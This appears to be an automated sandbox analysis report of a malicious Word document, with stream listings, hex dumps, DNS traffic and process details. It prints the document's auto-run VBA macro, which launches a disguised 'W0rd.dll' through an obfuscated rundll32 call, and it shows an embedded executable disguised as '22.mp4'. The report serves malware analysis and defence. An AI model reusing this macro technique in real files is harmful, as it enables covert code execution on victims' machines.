                                                                                                                                                        Stream Path:Macros/VBA/ThisDocument
                                                                                                                                                        VBA File Name:ThisDocument.cls
                                                                                                                                                        Stream Size:1743
                                                                                                                                                        Data ASCII:. . . . . . . . . T . . . . . . . . . . . . . . . \\ . . . H . . . . . . . . . . . G . . n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                        Data Raw:01 16 03 00 01 f0 00 00 00 54 03 00 00 d4 00 00 00 e2 01 00 00 ff ff ff ff 5c 03 00 00 48 05 00 00 00 00 00 00 01 00 00 00 47 91 f2 6e 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                        VBA Code Keywords

                                                                                                                                                        Keyword
                                                                                                                                                        VB_Name
                                                                                                                                                        VB_Creatable
                                                                                                                                                        VB_Exposed
                                                                                                                                                        AutoOpen()
                                                                                                                                                        VB_Customizable
                                                                                                                                                        a.ShellExecute("rund"
                                                                                                                                                        VB_TemplateDerived
                                                                                                                                                        "ThisDocument"
                                                                                                                                                        False
                                                                                                                                                        Attribute
                                                                                                                                                        Dir(ActiveDocument.AttachedTemplate.Path
                                                                                                                                                        VB_PredeclaredId
                                                                                                                                                        VB_GlobalNameSpace
                                                                                                                                                        SW_SHOWNORMAL)
                                                                                                                                                        VB_Base
                                                                                                                                                        Scr_hDC
                                                                                                                                                        ActiveDocument.AttachedTemplate.Path
                                                                                                                                                        VBA Code
                                                                                                                                                        Attribute VB_Name = "ThisDocument"
                                                                                                                                                        Attribute VB_Base = "1Normal.ThisDocument"
                                                                                                                                                        Attribute VB_GlobalNameSpace = False
                                                                                                                                                        Attribute VB_Creatable = False
                                                                                                                                                        Attribute VB_PredeclaredId = True
                                                                                                                                                        Attribute VB_Exposed = True
                                                                                                                                                        Attribute VB_TemplateDerived = True
                                                                                                                                                        Attribute VB_Customizable = True
                                                                                                                                                        
                                                                                                                                                        
                                                                                                                                                        Sub AutoOpen()
                                                                                                                                                        Call ssss
                                                                                                                                                        
                                                                                                                                                         If Dir(ActiveDocument.AttachedTemplate.Path & "\W0rd.dll") = "" Then
                                                                                                                                                         Else
                                                                                                                                                         
                                                                                                                                                        Dim a As New Shell32.Shell
                                                                                                                                                        Dim Scr_hDC As Long
                                                                                                                                                        Call a.ShellExecute("rund" & "ll" & "32.exe", ActiveDocument.AttachedTemplate.Path & "\W0rd.dll,Start", " ", SW_SHOWNORMAL)
                                                                                                                                                        End If
                                                                                                                                                        End Sub

                                                                                                                                                        Streams

                                                                                                                                                        Stream Path: \x1CompObj, File Type: data, Stream Size: 114
                                                                                                                                                        General
                                                                                                                                                        Stream Path:\x1CompObj
                                                                                                                                                        File Type:data
                                                                                                                                                        Stream Size:114
                                                                                                                                                        Entropy:4.2359563651
                                                                                                                                                        Base64 Encoded:True
                                                                                                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q . . . . . . . . . . . .
                                                                                                                                                        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                        Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 280
                                                                                                                                                        General
                                                                                                                                                        Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                        File Type:data
                                                                                                                                                        Stream Size:280
                                                                                                                                                        Entropy:2.3837065211
                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                        Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00
                                                                                                                                                        Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 436
                                                                                                                                                        General
                                                                                                                                                        Stream Path:\x5SummaryInformation
                                                                                                                                                        File Type:data
                                                                                                                                                        Stream Size:436
                                                                                                                                                        Entropy:3.43041331515
                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . L . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . B i g A d m i n i s t r a t o r . . . . . . . .
                                                                                                                                                        Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 84 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 a4 00 00 00 04 00 00 00 b0 00 00 00 05 00 00 00 cc 00 00 00 06 00 00 00 d8 00 00 00 07 00 00 00 e4 00 00 00 08 00 00 00 f8 00 00 00 09 00 00 00 14 01 00 00
                                                                                                                                                        Stream Path: 1Table, File Type: ARC archive data, crunched, Stream Size: 7940
                                                                                                                                                        General
                                                                                                                                                        Stream Path:1Table
                                                                                                                                                        File Type:ARC archive data, crunched
                                                                                                                                                        Stream Size:7940
                                                                                                                                                        Entropy:5.90771618128
                                                                                                                                                        Base64 Encoded:True
                                                                                                                                                        Data ASCII:. . . . . . . . w . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
                                                                                                                                                        Data Raw:1a 06 0f 00 12 00 01 00 77 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                                                                                                                                                        Stream Path: Data, File Type: data, Stream Size: 129034
                                                                                                                                                        General
                                                                                                                                                        Stream Path:Data
                                                                                                                                                        File Type:data
                                                                                                                                                        Stream Size:129034
                                                                                                                                                        Entropy:7.75936836126
                                                                                                                                                        Base64 Encoded:True
                                                                                                                                                        Data ASCII:7 . . . D . d . . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ~ . . . . . . . . . . . . . . . . . . . s . . . Z . . . . A . . . . . . . . . . . . . . . . ? . . . . . . . . . . . . . . . . . . . . . . . 2 . 0 . 2 . 0 . _ . 2 . . . P . i . c . t . u . r . e . . 1 . . . 2 . 0 . 2 . 0 . _ . 2 . . . . . . . . . . . . . . . R . . . e . . . . . . b b . . o . . k . 1 . U . { . . . A . . . . . . . D . . . . . p z . F . . 9 . . . . b
                                                                                                                                                        Data Raw:37 f3 01 00 44 00 64 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 9f 24 da 16 e8 03 e8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 7e 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 73 00 0b f0 5a 00 00 00 04 41 01 00 00 00 05 c1 0e 00 00 00 ff 01 00 00 08 00 3f 03 10 00 10 00 80 c3 14 00
                                                                                                                                                        Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 459
                                                                                                                                                        General
                                                                                                                                                        Stream Path:Macros/PROJECT
                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                        Stream Size:459
                                                                                                                                                        Entropy:5.38318286733
                                                                                                                                                        Base64 Encoded:True
                                                                                                                                                        Data ASCII:I D = " { 1 1 0 A 9 F D 0 - A 4 8 D - 4 3 4 6 - B D 2 3 - C D 9 3 8 7 2 F 3 4 6 8 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . M o d u l e = M o d u l e 1 . . M o d u l e = M o d u l e 2 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 8 5 8 7 4 B 7 1 4 B 9 1 4 F 9 1 4 F 9 1 4 F 9 1 4 F " . . D P B = " A 9 A B 6 7 7 8 6 8 7 8 6 8 7 8 " . . G C = " C D C F 0 3 B 9 0 3 D C 0 4 D
                                                                                                                                                        Data Raw:49 44 3d 22 7b 31 31 30 41 39 46 44 30 2d 41 34 38 44 2d 34 33 34 36 2d 42 44 32 33 2d 43 44 39 33 38 37 32 46 33 34 36 38 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c 65 31 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c 65 32 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48
                                                                                                                                                        Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 89
                                                                                                                                                        General
                                                                                                                                                        Stream Path:Macros/PROJECTwm
                                                                                                                                                        File Type:data
                                                                                                                                                        Stream Size:89
                                                                                                                                                        Entropy:3.27035029005
                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                        Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . M o d u l e 2 . M . o . d . u . l . e . 2 . . . . .
                                                                                                                                                        Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 31 00 00 00 4d 6f 64 75 6c 65 32 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 32 00 00 00 00 00
                                                                                                                                                        Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 3484
                                                                                                                                                        General
                                                                                                                                                        Stream Path:Macros/VBA/_VBA_PROJECT
                                                                                                                                                        File Type:data
                                                                                                                                                        Stream Size:3484
                                                                                                                                                        Entropy:4.50229327005
                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                        Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
                                                                                                                                                        Data Raw:cc 61 b2 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 06 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                                                                                                                                                        Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 703
                                                                                                                                                        General
                                                                                                                                                        Stream Path:Macros/VBA/dir
                                                                                                                                                        File Type:data
                                                                                                                                                        Stream Size:703
                                                                                                                                                        Entropy:6.40700107529
                                                                                                                                                        Base64 Encoded:True
                                                                                                                                                        Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . . . . a . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * . \\ C . . . . * . . a .
                                                                                                                                                        Data Raw:01 bb b2 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 a1 cd a2 61 0a 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30
                                                                                                                                                        Stream Path: ObjectPool/_1667171533/\x1CompObj, File Type: data, Stream Size: 76
                                                                                                                                                        General
                                                                                                                                                        Stream Path:ObjectPool/_1667171533/\x1CompObj
                                                                                                                                                        File Type:data
                                                                                                                                                        Stream Size:76
                                                                                                                                                        Entropy:3.09344952647
                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . O L E P a c k a g e . . . . . . . . . P a c k a g e . . 9 . q . . . . . . . . . . . .
                                                                                                                                                        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 0c 00 03 00 00 00 00 00 c0 00 00 00 00 00 00 46 0c 00 00 00 4f 4c 45 20 50 61 63 6b 61 67 65 00 00 00 00 00 08 00 00 00 50 61 63 6b 61 67 65 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                        Stream Path: ObjectPool/_1667171533/\x1Ole10Native, File Type: data, Stream Size: 453046
                                                                                                                                                        General
                                                                                                                                                        Stream Path:ObjectPool/_1667171533/\x1Ole10Native
                                                                                                                                                        File Type:data
                                                                                                                                                        Stream Size:453046
                                                                                                                                                        Entropy:6.15758899612
                                                                                                                                                        Base64 Encoded:True
                                                                                                                                                        Data ASCII:. . . . . . 2 2 . m p 4 . C : \\ U s e r s \\ B i g A d m i n i s t r a t o r \\ A p p D a t a \\ L o c a l \\ M i c r o s o f t \\ W i n d o w s \\ I N e t C a c h e \\ C o n t e n t . M S O \\ 2 2 . m p 4 . . . . . , . . . C : \\ U s e r s \\ B I G A D M ~ 1 \\ A p p D a t a \\ L o c a l \\ T e m p \\ 2 2 . m p 4 . . . . . M Z . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ! . . L . ! T h i s p r o g r a m c a n n o t b e
                                                                                                                                                        Data Raw:b2 e9 06 00 02 00 32 32 2e 6d 70 34 00 43 3a 5c 55 73 65 72 73 5c 42 69 67 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 4d 69 63 72 6f 73 6f 66 74 5c 57 69 6e 64 6f 77 73 5c 49 4e 65 74 43 61 63 68 65 5c 43 6f 6e 74 65 6e 74 2e 4d 53 4f 5c 32 32 2e 6d 70 34 00 00 00 03 00 2c 00 00 00 43 3a 5c 55 73 65 72 73 5c 42 49 47 41 44 4d 7e 31 5c 41 70
                                                                                                                                                        Stream Path: ObjectPool/_1667171533/\x3ObjInfo, File Type: data, Stream Size: 6
                                                                                                                                                        General
                                                                                                                                                        Stream Path:ObjectPool/_1667171533/\x3ObjInfo
                                                                                                                                                        File Type:data
                                                                                                                                                        Stream Size:6
                                                                                                                                                        Entropy:1.79248125036
                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                        Data ASCII:@ . . . . .
                                                                                                                                                        Data Raw:40 00 03 00 01 00
                                                                                                                                                        Stream Path: WordDocument, File Type: data, Stream Size: 4096
                                                                                                                                                        General
                                                                                                                                                        Stream Path:WordDocument
                                                                                                                                                        File Type:data
                                                                                                                                                        Stream Size:4096
                                                                                                                                                        Entropy:1.58736027199
                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                        Data ASCII:. . . . Y . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b j b j 8 . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . Z p . e Z p . e . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . B . . . . . . . B . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                        Data Raw:ec a5 c1 00 59 00 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 16 08 00 00 0e 00 62 6a 62 6a 38 1a 38 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 2e 0e 00 00 5a 70 d2 65 5a 70 d2 65 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

                                                                                                                                                        Network Behavior

                                                                                                                                                        Network Port Distribution

                                                                                                                                                        UDP Packets

                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                        Nov 18, 2020 16:23:44.672111988 CET6083153192.168.2.38.8.8.8
                                                                                                                                                        Nov 18, 2020 16:23:44.699354887 CET53608318.8.8.8192.168.2.3
                                                                                                                                                        Nov 18, 2020 16:23:45.734983921 CET6010053192.168.2.38.8.8.8
                                                                                                                                                        Nov 18, 2020 16:23:45.762037992 CET53601008.8.8.8192.168.2.3
                                                                                                                                                        Nov 18, 2020 16:23:46.561341047 CET5319553192.168.2.38.8.8.8
                                                                                                                                                        Nov 18, 2020 16:23:46.596785069 CET53531958.8.8.8192.168.2.3
                                                                                                                                                        Nov 18, 2020 16:23:47.481641054 CET5014153192.168.2.38.8.8.8
                                                                                                                                                        Nov 18, 2020 16:23:47.517193079 CET53501418.8.8.8192.168.2.3
                                                                                                                                                        Nov 18, 2020 16:23:48.716761112 CET5302353192.168.2.38.8.8.8
                                                                                                                                                        Nov 18, 2020 16:23:48.743879080 CET53530238.8.8.8192.168.2.3
                                                                                                                                                        Nov 18, 2020 16:23:49.673250914 CET4956353192.168.2.38.8.8.8
                                                                                                                                                        Nov 18, 2020 16:23:49.700500965 CET53495638.8.8.8192.168.2.3
                                                                                                                                                        Nov 18, 2020 16:23:49.967376947 CET5135253192.168.2.38.8.8.8
                                                                                                                                                        Nov 18, 2020 16:23:50.002960920 CET53513528.8.8.8192.168.2.3
                                                                                                                                                        Nov 18, 2020 16:23:50.513377905 CET5934953192.168.2.38.8.8.8
                                                                                                                                                        Nov 18, 2020 16:23:50.550532103 CET53593498.8.8.8192.168.2.3
                                                                                                                                                        Nov 18, 2020 16:23:51.519773006 CET5934953192.168.2.38.8.8.8
                                                                                                                                                        Nov 18, 2020 16:23:51.556525946 CET53593498.8.8.8192.168.2.3
                                                                                                                                                        Nov 18, 2020 16:23:52.535950899 CET5934953192.168.2.38.8.8.8
                                                                                                                                                        Nov 18, 2020 16:23:52.571599007 CET53593498.8.8.8192.168.2.3
                                                                                                                                                        Nov 18, 2020 16:23:53.249342918 CET5708453192.168.2.38.8.8.8
                                                                                                                                                        Nov 18, 2020 16:23:53.276588917 CET53570848.8.8.8192.168.2.3
                                                                                                                                                        Nov 18, 2020 16:23:54.062916994 CET5882353192.168.2.38.8.8.8
                                                                                                                                                        Nov 18, 2020 16:23:54.090373039 CET53588238.8.8.8192.168.2.3
                                                                                                                                                        Nov 18, 2020 16:23:54.552730083 CET5934953192.168.2.38.8.8.8
                                                                                                                                                        Nov 18, 2020 16:23:54.588104963 CET53593498.8.8.8192.168.2.3
                                                                                                                                                        Nov 18, 2020 16:23:54.873327971 CET5756853192.168.2.38.8.8.8
                                                                                                                                                        Nov 18, 2020 16:23:54.900521994 CET53575688.8.8.8192.168.2.3
                                                                                                                                                        Nov 18, 2020 16:23:55.744959116 CET5054053192.168.2.38.8.8.8
                                                                                                                                                        Nov 18, 2020 16:23:55.772099018 CET53505408.8.8.8192.168.2.3
                                                                                                                                                        Nov 18, 2020 16:23:56.575012922 CET5436653192.168.2.38.8.8.8
                                                                                                                                                        Nov 18, 2020 16:23:56.602183104 CET53543668.8.8.8192.168.2.3
                                                                                                                                                        Nov 18, 2020 16:23:58.573808908 CET5934953192.168.2.38.8.8.8
                                                                                                                                                        Nov 18, 2020 16:23:58.609177113 CET53593498.8.8.8192.168.2.3
                                                                                                                                                        Nov 18, 2020 16:24:10.710871935 CET5303453192.168.2.38.8.8.8
                                                                                                                                                        Nov 18, 2020 16:24:10.737885952 CET53530348.8.8.8192.168.2.3
                                                                                                                                                        Nov 18, 2020 16:24:16.322771072 CET5776253192.168.2.38.8.8.8
                                                                                                                                                        Nov 18, 2020 16:24:16.358537912 CET53577628.8.8.8192.168.2.3
                                                                                                                                                        Nov 18, 2020 16:24:32.313694000 CET5543553192.168.2.38.8.8.8
                                                                                                                                                        Nov 18, 2020 16:24:32.349092960 CET53554358.8.8.8192.168.2.3
                                                                                                                                                        Nov 18, 2020 16:24:33.835822105 CET5071353192.168.2.38.8.8.8
                                                                                                                                                        Nov 18, 2020 16:24:33.871289015 CET53507138.8.8.8192.168.2.3
                                                                                                                                                        Nov 18, 2020 16:24:48.684983015 CET5613253192.168.2.38.8.8.8
                                                                                                                                                        Nov 18, 2020 16:24:48.712060928 CET53561328.8.8.8192.168.2.3
                                                                                                                                                        Nov 18, 2020 16:24:52.870249033 CET5898753192.168.2.38.8.8.8
                                                                                                                                                        Nov 18, 2020 16:24:52.907192945 CET53589878.8.8.8192.168.2.3
                                                                                                                                                        Nov 18, 2020 16:25:30.357062101 CET5657953192.168.2.38.8.8.8
                                                                                                                                                        Nov 18, 2020 16:25:30.384232044 CET53565798.8.8.8192.168.2.3
                                                                                                                                                        Nov 18, 2020 16:25:33.563417912 CET6063353192.168.2.38.8.8.8
                                                                                                                                                        Nov 18, 2020 16:25:33.590511084 CET53606338.8.8.8192.168.2.3
                                                                                                                                                        Nov 18, 2020 16:26:38.822729111 CET6129253192.168.2.38.8.8.8
                                                                                                                                                        Nov 18, 2020 16:26:38.858268976 CET53612928.8.8.8192.168.2.3
                                                                                                                                                        Nov 18, 2020 16:26:39.382054090 CET6361953192.168.2.38.8.8.8
                                                                                                                                                        Nov 18, 2020 16:26:39.417794943 CET53636198.8.8.8192.168.2.3
                                                                                                                                                        Nov 18, 2020 16:26:39.850081921 CET6493853192.168.2.38.8.8.8
                                                                                                                                                        Nov 18, 2020 16:26:39.885713100 CET53649388.8.8.8192.168.2.3
                                                                                                                                                        Nov 18, 2020 16:26:40.193862915 CET6194653192.168.2.38.8.8.8
                                                                                                                                                        Nov 18, 2020 16:26:40.229302883 CET53619468.8.8.8192.168.2.3
                                                                                                                                                        Nov 18, 2020 16:26:40.656085968 CET6491053192.168.2.38.8.8.8
                                                                                                                                                        Nov 18, 2020 16:26:40.683223009 CET53649108.8.8.8192.168.2.3
                                                                                                                                                        Nov 18, 2020 16:26:41.181739092 CET5212353192.168.2.38.8.8.8
                                                                                                                                                        Nov 18, 2020 16:26:41.219552994 CET53521238.8.8.8192.168.2.3
                                                                                                                                                        Nov 18, 2020 16:26:41.848578930 CET5613053192.168.2.38.8.8.8
                                                                                                                                                        Nov 18, 2020 16:26:41.875646114 CET53561308.8.8.8192.168.2.3
                                                                                                                                                        Nov 18, 2020 16:26:42.596065998 CET5633853192.168.2.38.8.8.8
                                                                                                                                                        Nov 18, 2020 16:26:42.632189035 CET53563388.8.8.8192.168.2.3
                                                                                                                                                        Nov 18, 2020 16:26:43.354547977 CET5942053192.168.2.38.8.8.8
                                                                                                                                                        Nov 18, 2020 16:26:43.381690025 CET53594208.8.8.8192.168.2.3
                                                                                                                                                        Nov 18, 2020 16:26:43.723516941 CET5878453192.168.2.38.8.8.8
                                                                                                                                                        Nov 18, 2020 16:26:43.761198997 CET53587848.8.8.8192.168.2.3
                                                                                                                                                        Nov 18, 2020 16:28:32.424343109 CET6397853192.168.2.38.8.8.8
                                                                                                                                                        Nov 18, 2020 16:28:32.459765911 CET53639788.8.8.8192.168.2.3
                                                                                                                                                        Nov 18, 2020 16:28:33.076272964 CET6293853192.168.2.38.8.8.8
                                                                                                                                                        Nov 18, 2020 16:28:33.111910105 CET53629388.8.8.8192.168.2.3
                                                                                                                                                        Nov 18, 2020 16:28:36.854615927 CET5570853192.168.2.38.8.8.8
                                                                                                                                                        Nov 18, 2020 16:28:36.898546934 CET53557088.8.8.8192.168.2.3
                                                                                                                                                        Nov 18, 2020 16:28:42.821544886 CET5680353192.168.2.38.8.8.8
                                                                                                                                                        Nov 18, 2020 16:28:42.857161045 CET53568038.8.8.8192.168.2.3
                                                                                                                                                        Nov 18, 2020 16:28:43.086266041 CET5714553192.168.2.38.8.8.8
                                                                                                                                                        Nov 18, 2020 16:28:43.121985912 CET53571458.8.8.8192.168.2.3

                                                                                                                                                        Code Manipulations

                                                                                                                                                        Statistics

                                                                                                                                                        CPU Usage

                                                                                                                                                        Click to jump to process

                                                                                                                                                        Memory Usage

                                                                                                                                                        Click to jump to process

                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                        System Behavior

                                                                                                                                                        General

                                                                                                                                                        Start time:16:23:47
                                                                                                                                                        Start date:18/11/2020
                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding
                                                                                                                                                        Imagebase:0x1d0000
                                                                                                                                                        File size:1937688 bytes
                                                                                                                                                        MD5 hash:0B9AB9B9C4DE429473D6450D4297A123
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high

                                                                                                                                                        Disassembly

                                                                                                                                                        Call Graph

                                                                                                                                                        Graph

                                                                                                                                                        Module: Module1

                                                                                                                                                        Declaration
                                                                                                                                                        LineContent
                                                                                                                                                        1

                                                                                                                                                        Attribute VB_Name = "Module1"

                                                                                                                                                        Non-Executed Functions
